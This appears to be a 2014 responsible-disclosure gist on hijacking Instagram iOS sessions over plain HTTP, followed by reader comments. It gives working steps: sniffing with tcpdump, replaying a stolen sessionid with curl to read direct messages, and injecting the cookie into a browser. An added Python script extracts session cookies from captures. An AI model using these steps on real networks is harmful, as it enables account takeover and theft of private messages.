FB Responsible Disclosure

Instagram iOS session hijack

The Instagram iOS app makes API calls to plain-HTTP endpoints on i.instagram.com with its session cookies in the request headers, so anyone who can sniff the network traffic can lift the sessionid and take over the session completely.

Steps to reproduce (on Mac OS X):

  • Join an open or WEP-encrypted wifi access point (on WEP the captured frames still have to be decrypted with the network key, which you have as a client of that network)
  • Put the wireless interface into monitor mode and capture only traffic destined for i.instagram.com. In tcpdump, -I enables monitor mode, -n disables name resolution and -A prints each payload as ASCII, so the HTTP headers are readable directly:
     sudo tcpdump -In -i en0 -s 2048 -A dst i.instagram.com

  • Wait for someone to use the Instagram iOS app on the same network
  • Extract the Cookie request header from the resulting output
  • Use the sessionid cookie to make any API call as that user, including calls to HTTPS-only endpoints such as direct messages:
     curl -H 'User-Agent: Instagram 6.0.4 (iPhone6,2; iPhone OS 7_1_1; en_GB; en-GB) AppleWebKit/420+' \
          -H 'Cookie: sessionid=REDACTED' \
          https://i.instagram.com/api/v1/direct_share/inbox/

This returns the user's direct message inbox as JSON.

I was able to perform a session hijack on my own account on my laptop while someone else browsed Instagram on my iPhone.

I was also able to:

  • take the cookie sniffed from the iOS app
  • go to instagram.com as a logged-out user
  • set document.cookie = $COOKIE
  • navigate to a profile
  • see I'm logged in as that user

There is some screwy behaviour where 'instagram.com/' gets into a redirect loop; I will see if I can fix that. However, going to 'instagram.com/someones_profile' works and shows me as logged in.

I think this attack is extremely severe because it allows full session hijack and is easily automated. I could go to the Apple Store tomorrow and reap thousands of accounts in one day, and then use them to post spam.

Recommendations:

  • Use SSL everywhere: serve every API endpoint over HTTPS and set the Secure flag on the session cookie so the client never attaches it to a plaintext request
  • Revoke all logged-in sessions, since any sessionid already captured stays valid until it is invalidated
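The "extract the Cookie header" step above, and the Secure-flag check behind the first recommendation, as an added example that is not part of the gist: a small Python script that parses `tcpdump -A` text, pulls session cookies out of plaintext requests, and flags any session cookie a server sets without the Secure attribute. The capture text is constructed, as are the addresses, paths and cookie values; only the cookie name `sessionid` and the host come from the gist, everything else is an assumption. The parser relies on tcpdump printing each HTTP header on its own line (it renders CRLF as a newline) and on -n leaving ports numeric.

```python
import re
from collections import namedtuple

# Constructed sample of `tcpdump -A` output for one plaintext HTTP request/response pair; addresses, paths and cookie values are illustrative, not captured data.
SAMPLE_CAPTURE = """\
12:00:01.000000 IP 192.168.1.23.52000 > 203.0.113.10.80: Flags [P.], seq 1:300, ack 1, win 65535, length 299
E..+..@.@...
GET /api/v1/feed/timeline/ HTTP/1.1
Host: i.instagram.com
Cookie: csrftoken=REDACTEDCSRF; sessionid=REDACTEDSESSION; ds_user_id=12345

12:00:01.200000 IP 203.0.113.10.80 > 192.168.1.23.52000: Flags [P.], seq 1:200, ack 300, win 65535, length 199
E..+..@.@...
HTTP/1.1 200 OK
Set-Cookie: sessionid=REDACTEDSESSION; Path=/; HttpOnly
Set-Cookie: csrftoken=REDACTEDCSRF; Path=/; Secure

{"status":"ok"}
"""

# Packet header as tcpdump prints it with -n: numeric addresses, port as the last dotted component.
PACKET_HEADER = re.compile(r"^\d{2}:\d{2}:\d{2}\.\d+ IP6? (?P<src>\S+) > (?P<dst>\S+): ")
REQUEST_LINE = re.compile(r"^(GET|POST|PUT|PATCH|DELETE|HEAD|OPTIONS) (\S+) HTTP/1\.[01]$")
STATUS_LINE = re.compile(r"^HTTP/1\.[01] \d{3}")
SESSION_COOKIES = ("sessionid",)  # cookie names that authenticate a request on their own

Leak = namedtuple("Leak", "host path cookie value dst_port")

def split_packets(capture):
    """Group -A output into (src, dst, payload_lines) triples, one per packet."""
    packets = []
    for line in capture.splitlines():
        m = PACKET_HEADER.match(line)
        if m:
            packets.append((m["src"], m["dst"], []))
        elif packets:
            packets[-1][2].append(line.rstrip("\r"))
    return packets

def parse_http(lines):
    """First HTTP message in a payload as (start_line, [(name, value), ...]), else None.
    Skips the IP/TCP header bytes that -A renders as junk; keeps repeated headers (Set-Cookie)."""
    for i, line in enumerate(lines):
        if REQUEST_LINE.match(line) or STATUS_LINE.match(line):
            headers = []
            for hdr in lines[i + 1:]:
                if hdr == "":
                    break
                name, sep, value = hdr.partition(":")
                if sep:
                    headers.append((name.strip().lower(), value.strip()))
            return line, headers
    return None

def parse_cookie_header(value):
    """Turn 'a=1; b=2' into {'a': '1', 'b': '2'}; parts without '=' are ignored."""
    cookies = {}
    for part in value.split(";"):
        name, sep, val = part.strip().partition("=")
        if sep:
            cookies[name] = val
    return cookies

def find_leaked_sessions(capture, session_names=SESSION_COOKIES):
    """Every session cookie visible in a request payload. TLS payload never shows up as
    ASCII in a capture, so a readable Cookie header was by definition sent in the clear."""
    leaks = []
    for _src, dst, lines in split_packets(capture):
        msg = parse_http(lines)
        req = REQUEST_LINE.match(msg[0]) if msg else None
        if req is None:
            continue
        hdrs = dict(msg[1])
        cookies = parse_cookie_header(hdrs.get("cookie", ""))
        for name in session_names:
            if name in cookies:
                leaks.append(Leak(hdrs.get("host", dst), req.group(2), name, cookies[name], dst.rsplit(".", 1)[-1]))
    return leaks

def audit_set_cookie(capture, session_names=SESSION_COOKIES):
    """Session cookies a server issues without the Secure attribute. Without it the client
    attaches the cookie to plain-HTTP requests as well, which is the root cause here."""
    findings = []
    for src, _dst, lines in split_packets(capture):
        msg = parse_http(lines)
        if msg is None or not STATUS_LINE.match(msg[0]):
            continue
        for name, value in msg[1]:
            if name != "set-cookie":
                continue
            attrs = [a.strip() for a in value.split(";")]
            cookie_name = attrs[0].partition("=")[0]
            if cookie_name in session_names and "secure" not in {a.lower() for a in attrs[1:]}:
                findings.append(f"{cookie_name} set by {src} without Secure")
    return findings

if __name__ == "__main__":
    for leak in find_leaked_sessions(SAMPLE_CAPTURE):
        print(f"LEAK {leak.cookie}={leak.value} for {leak.host}{leak.path} sent to port {leak.dst_port}")
    for finding in audit_set_cookie(SAMPLE_CAPTURE):
        print("WEAK", finding)
```

Run it as-is on the embedded sample, or redirect the output of the tcpdump command above to a file and pass its contents to `find_leaked_sessions`. Any `Leak` it reports is a cookie that travelled over plain HTTP; any `WEAK` finding is a server-side cookie that should have carried the Secure flag.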
wodim commented Jul 27, 2014

I'm adding another recommendation:

  • Sue me
stevegraham (Owner) commented Jul 27, 2014

@wodim I adhered to the FB responsible disclosure procedure. FB replied saying they're already aware of the issue and closed the ticket.

jasiek commented Jul 28, 2014

Can you crawl their contact list, or is that SSL-ed?

jcready commented Jul 28, 2014

@wodim what would @stevegraham be sued for even if he didn't adhere to FB's responsible disclosure procedure? People might have frowned on releasing this information before disclosing it to Facebook, but AFAIK there is nothing here that Facebook could sue him for (and win the decision).

ceejayoz commented Jul 28, 2014

@jasiek The gist says the session is valid even on HTTPS endpoints.

rmrhz commented Jul 28, 2014

That's a nice catch.

stevegraham (Owner) commented Jul 28, 2014

@jasiek once you have a cookie, any endpoint can be authenticated with the cookie, HTTPS or HTTP.

jasonmp85 commented Jul 28, 2014

"Sue"? Maybe not. But in the good ol' US of A you can probably be prosecuted under this by anyone with a sufficiently large axe to grind.

donfrancisco commented Jul 29, 2014

Got the instasheep domain name if you want me to point it at a github repo.

anands commented Jul 30, 2014

+1

vs4vijay commented Jul 31, 2014

Cool

Mamugian commented Jul 31, 2014

As I read it, it works only on Mac though... right?

boserup commented Jul 31, 2014

@Mamugian Given that the Instagram user is connected via an unsecured connection (HTTP) to the API, any device capable of TCP dumping will be able to do this.

jlopez1286 commented Aug 1, 2014

The tool is for what platform? PC, Mac, Android?

TevLar0202 commented Aug 6, 2014

@Mamugian It could work on any Unix/Linux platform.

josephrexme commented Aug 9, 2014

@jlopez1286 Seriously? tcpdump. Didn't expect to see such a question on this gist.

rashidasgari commented Oct 20, 2014

I'm not really experienced with packet sniffing and all this advanced networking stuff. But I was able to do the packet sniffing on an unsecured network using Wireshark and get the session ID from the cookie headers. What do I have to do from here? I would be grateful if anyone could help.
